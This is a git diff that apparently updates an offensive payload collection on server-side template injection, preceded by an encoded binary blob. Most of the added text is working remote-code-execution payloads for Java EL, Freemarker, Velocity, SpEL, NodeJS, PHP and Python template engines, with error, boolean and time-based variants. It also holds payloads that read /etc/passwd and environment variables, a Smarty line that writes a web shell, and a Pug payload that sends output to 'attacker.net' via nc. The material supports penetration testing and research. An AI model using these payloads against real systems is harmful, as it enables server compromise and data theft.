zajUwVXSb#i2__Z2jCI`C?jM1jTzUHgST|q4D%IakMeVrg3qE>ZGSYDADN5|Pax>^6
zrL4U!YlbgfwYg;WAtgdi=20FF5<B*D0Qdb^x4(9iH}ttbe?4M#R-UBENCSCx2@@mf
zGIyL7rM{=l7;38I+`WKr(A)Zn?{yMie_L7!$vHv1ul~e2m%QVT*w|Rz*E*2b);$L)
zyRaR$)mr8MNpA7G?ze*X){6>R7+&qv+<kTe4hQ4U#AvdSRI0L+`wPoci+B38)i$A@
z^xFbG-p$EQQAt1`TZol~Po;I|rNBwLPxO`Qt#x|}+ix{6*Qc{;^$_<bESINKCu4>v
zNnZl<a0<dX+RJ(i2k&M^DoY$`KA|I1rpm<6cDnJqO3tyOj}#-IvIDN9^dtH6cfp{N
zsQnppmgT`{Bd2;d`wC&%o1hH(tvnmaD&$V3huYf0)yd$R)$^xZeT3{UUCq^2-xSHQ
zw6$)aY(@IFsd>MZ?>=1_1){(;DT+}83sCTS2)>K>2REO@szNz8{~o<n#Am4!FZZw3
z8CHU-Uk<*>9wVqw!#8_VW9c^NMpdMULYwI&5;Aw*>8p@~k3irSw4Oz+%aZICuKw)|
zW#19id6Q1QyDg(pL88;wV0BKDYPE4CQ5_VnrcN_U{_Xs3uqqW%t~dSyfGw`zuERzz
zErw_-LWtuCP}(s_fYdJ($7#e~U6Vy|gg#r<SU=XMML5g0g|b^X`$S^6KQ9!sMTXAR
z#b>_REoa$1Ca>sHP!()|17nTdudVObaw+m3RV;I|D&00z1ScyNgU=c06UeduYnISw
zhuZ7S#8jXMHOygLy$3a0bp8xK_h<M-CHetVZ$MlsJ~(aAUgp0kntxkf|C9Xr9|wC=
z$mHUV<o>+^oeqi`0#emWi3i1p0=<$%3;jR_&&$`|Xgz^HLU$i9^NvBSKLLb?E7?1N
zt7w;(WM$XwGF3+u3TNt2A?N$J6%53s<qd2;lhgh>(g1!^`7QTsiG81lEA2PrLh!*J
z$(n*VH21L5Kt!aaxgcagy2j1`#^v)ovCRCsg-lHrgxz>kY62&I@KspOwqWN9Ak+4e
zbh2?#JmNkECm!r)ZCFm(Q9PRIf`c>5S0?hs%lb{qLaO(#ubO(t{PqiX3LULIS6p9s
zXdqk`lUFIRwB#HD!^nn5JC-U6S|#`4lU?yrUj=<KjbU8Vh0$9rm|aX|e;zu2)Y<uQ
z)cVtn1h=gYrupU?6MuAwl4_N}q<!P!+?Ko174&=%crdKXVv<X7OY9j)${AzpW3(HY
zE)qKdV<Va^e345y9BXs&C)f0bL$iz0_bm1tZ)-_U3B7A$ntDu{ue|5znH%>nL=chS
zwlFQ7aH3~@nC#3x^qb{!^vQasJI}YDA;AWNA<oOC#pAQrzrBdcizm3`l8?2Imll59
z!pMF-R(<T9rbyMN{rT)neje$@3Tnq@yHoV@F)*g`*s(Wb7;@}pzoT~b*im|>nT@{o
z?kyPu@ktA>;tVV5d_vtV`A{0;2aS~0A9vgip-gzUD%-lwdS=}l5B3mMPkgEtQ@C0K
zgFi^I#}6IVxXfOVID1c+chOEnuhNkWa7Xe5A%Qkz+MAo@=~St|2ozHq)_Xxa^)!m(
zJt3Fp%bn|cPF~d*Vw>>p`MutbcM0X7SmjhS_xMkpT4#_as3uwDWUD%Ns|p(%Pt`Vm
zH8o*V=<nG0TI@4*eL8=PjcEtPY2Wn0Wz`$@Hr4TL&}h{k4)=4lm<~Q&VfP6)&r#Dd
zi+-^ItC1XFe<nr5H9W5QSs&w;crCvLo5N6a&iT@Ur_cR?OjGMo-hZ<6pQ7V$_3^h6
z&t%uy#p%~1i#Xu?S(IDV9*$brzXX#QDN01c=8V>T0D8(36hw}gi_@pDWvXpRs(#)n
zVSdA6yzW9^mOBr5>4tr%rOgSF&0LPfqTc)EZ^OEVJ0;~(XxNZ@^2Z;*6{6ur7_>3)
z#|`?#;o0xi+M$*~A_i+o0`2kFmTSx_I5wIz$*IR7^Ufx<=%AZbj&N>5Y-fOx<8@|6
z1~<Np6d6Ie2+o;Lv3!u2)89QFOz5+5)_nuji!3RRYAm!WWsSp2Zz#1}1|056^Qr+n
zK^rF@ySt^?Wu#U7VFRW=>hzLcxVsRg)#^9!hg<B3RB)1hY08DE41AJD{@lG{N0G%t
z1Nom^K}D0D*^&dU99KV1=wa~%A9v4R%np;)4`F(SZg1Zg0iwd42SrWWXWj4!iH~}0
z^@O6O7Iv}{5CQGE<OHU9rEi7qM`qm_rEuBsE8m9i(I5BV)|t2{^Yg`IJHNg@g#<WH
z!EPk*N($w6QL>KEdi!u|abnc$%EOQ=&uD9@<TIiPZl@qiETs%(U&cOxo}{?d*2!%u
zu_w)F$>NWogUgzj10UYTDz8KW`PX3WIy*}r?y+uuGxUXzCD=r`tg9{;NaRm4rjd3a
zS{$OFe2KT+8Z~zgFZpngt~_DfiAYQF53p~=ux2`5N5nH?^>>m1{%afUIp_XVP@~Ez
zF|rv6?|vFCSvI;)YWlj>FpUL+!!}+;^2}>M3Jhj!Ofm>w%)D;b{(IMp!-_8rT6j3v
zm+OXJh!nXX<0JyN0txpD>=yfxK6zqDo}QiDIPVjP$nR0%;+z}(Kbzfrp(5-(;@M*^
zgC!&wnC>>c1YAe{RY|AKVMDx#M>k+RF&@$=Jg+C9au#(&6J+on36C_VWb_>XbShEi
z-kP8`*l=ILIOjNVPDF7p0^5@v@4Xs|;L(586@UtoSUDyh1J7rGWGGT@)|sRyBwm#<
zLXdWJ4yw8UK&5+7{B<g#K;UVV$v$=9!S92&EAo6MKn5~Mc(T`BuC}`Wb&tV<S;tjn
zS;=qbG*qY(-(bjhE*{($C@qWrE9oUrZ5?z~ByBD=x_kf6OUV+4Twkb-2~@v!b8+#`
z9!!poQsRx_$sX|WD#*I?Cf`AS$p|h7sF_+fAH18*VX&mGh>{3H%=!w9AD->m?K`UB
ztJog~uG`mjW#7x&`;+g4@<9U752YraQr<M?a6yG20d<35R8}NrhV9~P;U`Zut`BMO
zQuWAI3@l}baV=M?1Hq;!?!pRlR{lmjH4W}+9U~KbG&08d6MjyJBlJ+$>;a!yc0y^_
zw=Eo)Xy0`scp{+l=u;4ptsOo;8LzJA^CW*ap|QuJufDQeTv1@K&myoOGg>JnrLmAJ
zv`AJRIWnQCUh21#o=TMF?B(s6`~3tT&-hm2)|R?FN@BweYYd1WZ#Z$YOH_V#3~s2T
zm~NyWn8j-_rG`o-wYAbG?GkBxu4ZZ-T`EEXKqKiZ+IiZ%i!9b=<(VXk^aHi69U6E_
z8b;?wA8s%PYz=Ocj_$>Jcse=_VotNqdUSoCtGilb^6*M4{nyROCJyLD$j|<hd^|Cu
z_oHBT%j2V696J1vpGW2#_E2*MH5HkQ)r|2#%0(r;_Y(u|{2!$DAo?e^{@(^_fFbdR
Ynu3aq;Y&sK=@DRd#oV~+vg@ON0VUaeZ~y=R

literal 0
HcmV?d00001

diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 85078d89d0..0ad67dbe2a 100644
--- a/Server Side Template Injection/Java.md	
+++ b/Server Side Template Injection/Java.md	
@@ -5,16 +5,14 @@
 ## Summary
 
 - [Templating Libraries](#templating-libraries)
-- [Java](#java)
-    - [Java - Basic Injection](#java---basic-injection)
-    - [Java - Retrieve Environment Variables](#java---retrieve-environment-variables)
-    - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
+- [Java EL](#java-el)
+    - [Java EL - Basic Injection](#java-el---basic-injection)
+    - [Java EL - Code Execution](#java-el---code-execution)
 - [Freemarker](#freemarker)
     - [Freemarker - Basic Injection](#freemarker---basic-injection)
     - [Freemarker - Read File](#freemarker---read-file)
     - [Freemarker - Code Execution](#freemarker---code-execution)
     - [Freemarker - Sandbox Bypass](#freemarker---sandbox-bypass)
-- [Codepen](#codepen)
 - [Jinjava](#jinjava)
     - [Jinjava - Basic Injection](#jinjava---basic-injection)
     - [Jinjava - Command Execution](#jinjava---command-execution)
@@ -30,6 +28,8 @@
     - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
 - [Spring Expression Language](#spring-expression-language)
     - [SpEL - Basic Injection](#spel---basic-injection)
+    - [SpEL - Retrieve Environment Variables](#spel---retrieve-environment-variables)
+    - [SpEL - Retrieve /etc/passwd](#spel---retrieve-etcpasswd)
     - [SpEL - DNS Exfiltration](#spel---dns-exfiltration)
     - [SpEL - Session Attributes](#spel---session-attributes)
     - [SpEL - Command Execution](#spel---command-execution)
@@ -37,20 +37,22 @@
 
 ## Templating Libraries
 
-| Template Name | Payload Format |
-| ------------ | --------- |
-| Codepen    | `#{}`     |
-| Freemarker | `${3*3}`, `#{3*3}`, `[=3*3]` |
-| Groovy     | `${9*9}`  |
-| Jinjava    | `{{ }}`   |
-| Pebble     | `{{ }}`   |
-| Spring     | `*{7*7}`  |
-| Thymeleaf  | `[[ ]]`   |
-| Velocity   | `#set($X="") $X`             |
+| Template Name | Payload Format         |
+|---------------|------------------------|
+| Codepen       | `#{ }`                 |
+| Freemarker    | `${ }`, `#{ }`, `[= ]` |
+| Groovy        | `${ }`                 |
+| Jinjava       | `{{ }}`                |
+| Pebble        | `{{ }}`                |
+| Spring        | `*{ }`                 |
+| Thymeleaf     | `[[ ]]`                |
+| Velocity      | `#set($X="") $X`       |
 
-## Java
+## Java EL
 
-### Java - Basic Injection
+### Java EL - Basic Injection
+
+> Java has multiple Expression Languages using similar syntax.
 
 > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
 
@@ -62,18 +64,14 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 ```
 
-### Java - Retrieve Environment Variables
-
-```java
-${T(java.lang.System).getenv()}
-```
-
-### Java - Retrieve /etc/passwd
+### Java EL - Code Execution
 
 ```java
-${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
+${''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes())} // Rendered RCE
+${''.getClass().forName('java.lang.Integer').valueOf('x'+''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes()))} // Error-Based RCE
+${1/((''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor()==0)?1:0)+''} // Boolean-Based RCE
+${(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor().equals(0)?(''.getClass().forName('java.lang.Thread')).sleep(5000):0).toString()} // Time-Based RCE
 
-${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
 ---
@@ -108,6 +106,10 @@ Convert the returned bytes to ASCII
 ${"freemarker.template.utility.Execute"?new()("id")}
 #{"freemarker.template.utility.Execute"?new()("id")}
 [="freemarker.template.utility.Execute"?new()("id")]
+
+${("xx"+("freemarker.template.utility.Execute"?new()("id")))?new()} // Error-Based RCE
+${1/((freemarker.template.utility.Execute"?new()(" … && echo UniqueString")?chop_linebreak?ends_with("UniqueString"))?string('1','0')?eval)} // Boolean-Based RCE
+${"freemarker.template.utility.Execute"?new()("id && sleep 5")} // Time-Based RCE
 ```
 
 ### Freemarker - Sandbox Bypass
@@ -124,24 +126,6 @@ ${dwf.newInstance(ec,null)("id")}
 
 ---
 
-## Codepen
-
-[Official website](https://codepen.io/)
->
-
-```python
-- var x = root.process
-- x = x.mainModule.require
-- x = x('child_process')
-= x.exec('id | nc attacker.net 80')
-```
-
-```javascript
-#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
-```
-
----
-
 ## Jinjava
 
 [Official website](https://github.com/HubSpot/jinjava)
@@ -259,6 +243,41 @@ A more flexible and stealthy payload that supports base64-encoded commands, allo
 #end
 ```
 
+Error-Based RCE payload:
+
+```java
+#set($s="")
+#set($sc=$s.getClass().getConstructor($s.getClass().forName("[B"), $s.getClass()))
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id")
+#set($n=$p.waitFor())
+#set($b="Y:/A:/"+$sc.newInstance($p.inputStream.readAllBytes(), "UTF-8"))
+#include($b)
+```
+
+Boolean-Based RCE payload:
+
+```java
+#set($s="")
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id"))
+#set($n=$p.waitFor())
+#set($r=$p.exitValue())
+#if($r != 0)
+#include("Y:/A:/xxx")
+#end
+```
+
+Time-Based RCE payload:
+
+```java
+#set($s="")
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id"))
+#set($n=$p.waitFor())
+#set($r=$p.exitValue())
+#if($r != 0)
+#set($t=$s.getClass().forName("java.lang.Thread").sleep(5000))
+#end
+```
+
 ---
 
 ## Groovy
@@ -310,6 +329,8 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val
 
 ## Spring Expression Language
 
+> Java EL payloads also work for SpEL
+
 [Official website](https://docs.spring.io/spring-framework/docs/3.0.x/reference/expressions.html)
 
 > The Spring Expression Language (SpEL for short) is a powerful expression language that supports querying and manipulating an object graph at runtime. The language syntax is similar to Unified EL but offers additional features, most notably method invocation and basic string templating functionality.
@@ -321,6 +342,20 @@ ${7*7}
 ${'patt'.toString().replace('a', 'x')}
 ```
 
+### SpEL - Retrieve Environment Variables
+
+```java
+${T(java.lang.System).getenv()}
+```
+
+### SpEL - Retrieve /etc/passwd
+
+```java
+${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
+
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
+```
+
 ### SpEL - DNS Exfiltration
 
 DNS lookup
@@ -390,3 +425,4 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
 - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
 - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index 36ed268054..f317f735bf 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -5,31 +5,56 @@
 ## Summary
 
 - [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
 - [Handlebars](#handlebars)
     - [Handlebars - Basic Injection](#handlebars---basic-injection)
     - [Handlebars - Command Execution](#handlebars---command-execution)
 - [Lodash](#lodash)
     - [Lodash - Basic Injection](#lodash---basic-injection)
     - [Lodash - Command Execution](#lodash---command-execution)
+- [Pug](#pug)
 - [References](#references)
 
 ## Templating Libraries
 
-| Template Name | Payload Format |
-| ------------ | --------- |
-| DotJS        | `{{= }}`  |
-| DustJS       | `{}`      |
-| EJS          | `<% %>`   |
-| HandlebarsJS | `{{ }}`   |
-| HoganJS      | `{{ }}`   |
-| Lodash       | `{{= }}`  |
-| MustacheJS   | `{{ }}`   |
-| NunjucksJS   | `{{ }}`   |
-| PugJS        | `#{}`     |
-| TwigJS       | `{{ }}`   |
-| UnderscoreJS | `<% %>`   |
-| VelocityJS   | `#=set($X="")$X` |
-| VueJS        | `{{ }}`   |
+| Template Name | Payload Format   |
+|---------------|------------------|
+| DotJS         | `{{= }}`         |
+| DustJS        | `{ }`            |
+| EJS           | `<% %>`          |
+| HandlebarsJS  | `{{ }}`          |
+| HoganJS       | `{{ }}`          |
+| Lodash        | `{{= }}`         |
+| MustacheJS    | `{{ }}`          |
+| NunjucksJS    | `{{ }}`          |
+| PugJS         | `#{ }`           |
+| TwigJS        | `{{ }}`          |
+| UnderscoreJS  | `<% %>`          |
+| VelocityJS    | `#=set($X="")$X` |
+| VueJS         | `{{ }}`          |
+
+## Universal Payloads
+
+Generic code injection payloads work for many NodeJS-based template engines, such as DotJS, EJS, PugJS, UnderscoreJS and Eta.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```javascript
+// Rendered RCE
+require("child_process").execSync("id")
+
+// Error-Based RCE
+require("Y:/A:/"+require("child_process").execSync("id"))
+""["x"][require("child_process").execSync("id")]
+
+// Boolean-Based RCE
+[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
+
+// Time-Based RCE
+require("child_process").execSync("id && sleep 5")
+```
+
+NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.
 
 ## Handlebars
 
@@ -120,7 +145,26 @@ ${= _.VERSION}
 {{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
 ```
 
+---
+
+## Pug
+
+[Official website](https://pugjs.org/api/getting-started.html)
+>
+
+```javascript
+- var x = root.process
+- x = x.mainModule.require
+- x = x('child_process')
+= x.exec('id | nc attacker.net 80')
+```
+
+```javascript
+#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
+```
+
 ## References
 
 - [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
 - [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index cc3618c315..5762a55710 100644
--- a/Server Side Template Injection/PHP.md	
+++ b/Server Side Template Injection/PHP.md	
@@ -5,6 +5,7 @@
 ## Summary
 
 - [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
 - [Smarty](#smarty)
 - [Twig](#twig)
     - [Twig - Basic Injection](#twig---basic-injection)
@@ -22,16 +23,43 @@
 ## Templating Libraries
 
 | Template Name   | Payload Format |
-| --------------- | --------- |
-| Blade (Laravel) | `{{ }}`   |
-| Latte           | `{var $X=""}{$X}`   |
-| Mustache        | `{{ }}`   |
-| Plates          | `<?= ?>`  |
-| Smarty          | `{ }`     |
-| Twig            | `{{ }}`   |
+|-----------------|----------------|
+| Blade (Laravel) | `{{ }}`        |
+| Latte           | `{ }`          |
+| Mustache        | `{{ }}`        |
+| Plates          | `<?= ?>`       |
+| Smarty          | `{ }`          |
+| Twig            | `{{ }}`        |
+
+## Universal Payloads
+
+Generic code injection payloads work for many PHP-based template engines, such as Blade, Latte and Smarty.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```php
+// Rendered RCE
+shell_exec('id')
+system('id')
+
+// Error-Based RCE
+ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based
+fopen(join("", ["Y:/A:/", shell_exec('id')]), "r")
+include(join("", ["Y:/A:/", shell_exec('id')]))
+join("", ["xx", shell_exec('id')])()
+
+// Boolean-Based RCE
+1 / (pclose(popen("id", "wb")) == 0)
+
+// Time-Based RCE
+shell_exec('id && sleep 5')
+system('id && sleep 5')
+```
 
 ## Blade
 
+> Universal payloads also work for Blade.
+
 [Official website](https://laravel.com/docs/master/blade)
 > Blade is the simple, yet powerful templating engine that is included with Laravel.
 
@@ -45,6 +73,8 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr
 
 ## Smarty
 
+> Universal payloads also work for Smarty before v5.
+
 [Official website](https://www.smarty.net/docs/en/)
 > Smarty is a template engine for PHP.
 
@@ -52,8 +82,8 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr
 {$smarty.version}
 {php}echo `id`;{/php} //deprecated in smarty v3
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
-{system('ls')} // compatible v3
-{system('cat index.php')} // compatible v3
+{system('ls')} // compatible v3, deprecated in v5
+{system('cat index.php')} // compatible v3, deprecated in v5
 ```
 
 ---
@@ -109,6 +139,19 @@ $output = $twig > render (
 {{['id']|filter('passthru')}}
 {{['id']|map('passthru')}}
 {{['nslookup oastify.com']|filter('system')}}
+
+{% for a in ["error_reporting", "1"]|sort("ini_set") %}{% endfor %} // Enable verbose error output for Error-Based
+{{_self.env.registerUndefinedFilterCallback("shell_exec")}}{%include ["Y:/A:/", _self.env.getFilter("id")]|join%} // Error-Based RCE <= 1.19
+{{[0]|map(["xx", {"id": "shell_exec"}|map("call_user_func")|join]|join)}} // Error-Based RCE >=1.41, >=2.10, >=3.0
+
+{{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19
+{{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0
+{{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614
+```
+
+With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases:
+```php
+{{ {'id':'shell_exec'}|map('call_user_func')|join }}
 ```
 
 Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
@@ -128,6 +171,8 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
 
 ## Latte
 
+> Universal payloads also work for Latte.
+
 ### Latte - Basic Injection
 
 ```php
@@ -262,5 +307,6 @@ layout template:
 
 ## References
 
-- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md
index 056d605710..a95c9e84bc 100644
--- a/Server Side Template Injection/Python.md	
+++ b/Server Side Template Injection/Python.md	
@@ -5,6 +5,7 @@
 ## Summary
 
 - [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
 - [Django](#django)
     - [Django - Basic Injection](#django---basic-injection)
     - [Django - Cross-Site Scripting](#django---cross-site-scripting)
@@ -37,15 +38,28 @@
 ## Templating Libraries
 
 | Template Name | Payload Format |
-| ------------ | --------- |
-| Bottle    | `{{ }}`  |
-| Chameleon | `${ }`   |
-| Cheetah   | `${ }`   |
-| Django    | `{{ }}`  |
-| Jinja2    | `{{ }}`  |
-| Mako      | `${ }`   |
-| Pystache  | `{{ }}`  |
-| Tornado   | `{{ }}`  |
+|---------------|----------------|
+| Bottle        | `{{ }}`        |
+| Chameleon     | `${ }`         |
+| Cheetah       | `${ }`         |
+| Django        | `{{ }}`        |
+| Jinja2        | `{{ }}`        |
+| Mako          | `${ }`         |
+| Pystache      | `{{ }}`        |
+| Tornado       | `{{ }}`        |
+
+## Universal Payloads
+
+Generic code injection payloads work for many Python-based template engines, such as Bottle, Chameleon, Cheetah, Mako and Tornado.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```python
+__include__("os").popen("id").read() # Rendered RCE
+getattr("", "x" + __include__("os").popen("id").read()) # Error-Based RCE
+1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE
+__include__("os").popen("id && sleep 5").read() # Time-Based RCE
+```
 
 ## Django
 
@@ -220,6 +234,13 @@ We can use these shorter payloads from [@podalirius_](https://twitter.com/podali
 {{ namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
+Similar payloads could be used for Error-Based and Boolean-Based exploitation:
+
+```python
+{{ cycler.__init__.__globals__.__builtins__.getattr("", "x" + cycler.__init__.__globals__.os.popen('id').read()) }} # Error-Based
+{{ 1 / (cycler.__init__.__globals__.os.popen("id")._proc.wait() == 0) }} # Boolean-Based
+```
+
 With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
 
 ```python
@@ -303,6 +324,8 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by [@Se
 
 ## Tornado
 
+> Universal payloads also work for Tornado.
+
 ### Tornado - Basic Injection
 
 ```py
@@ -321,6 +344,8 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by [@Se
 
 ## Mako
 
+> Universal payloads also work for Mako.
+
 [Official website](https://www.makotemplates.org/)
 > Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
 
@@ -407,3 +432,4 @@ PoC :
 - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
 - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index f7a79f5e88..0a14036bce 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -1,15 +1,24 @@
 # Server Side Template Injection
 
-> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
+> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages.
 
 ## Summary
 
 - [Tools](#tools)
 - [Methodology](#methodology)
-    - [Identify the Vulnerable Input Field](#identify-the-vulnerable-input-field)
-    - [Inject Template Syntax](#inject-template-syntax)
-    - [Enumerate the Template Engine](#enumerate-the-template-engine)
-    - [Escalate to Code Execution](#escalate-to-code-execution)
+    - [Detection and Exploitation Techniques](#detection-and-exploitation-techniques)
+        - [Rendered](#rendered)
+        - [Error-Based](#error-based)
+        - [Boolean-Based](#boolean-based)
+        - [Time-Based](#time-based)
+        - [Out of Bounds](#out-of-bounds)
+        - [Polyglot-Based](#polyglot-based)
+    - [Universal Detection Payloads](#universal-detection-payloads)
+    - [Manual Detection and Exploitation](#manual-detection-and-exploitation)
+        - [Identify the Vulnerable Input Field](#identify-the-vulnerable-input-field)
+        - [Inject Template Syntax](#inject-template-syntax)
+        - [Enumerate the Template Engine](#enumerate-the-template-engine)
+        - [Escalate to Code Execution](#escalate-to-code-execution)
 - [Labs](#labs)
 - [References](#references)
 
@@ -32,15 +41,133 @@
 
 - [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap)
 
-  ```powershell
+  ```bash
   python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
-  python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
+  python3 ./sstimap.py -i -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
   python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
   ```
 
 ## Methodology
 
-### Identify the Vulnerable Input Field
+### Detection and Exploitation Techniques
+
+Original research:
+
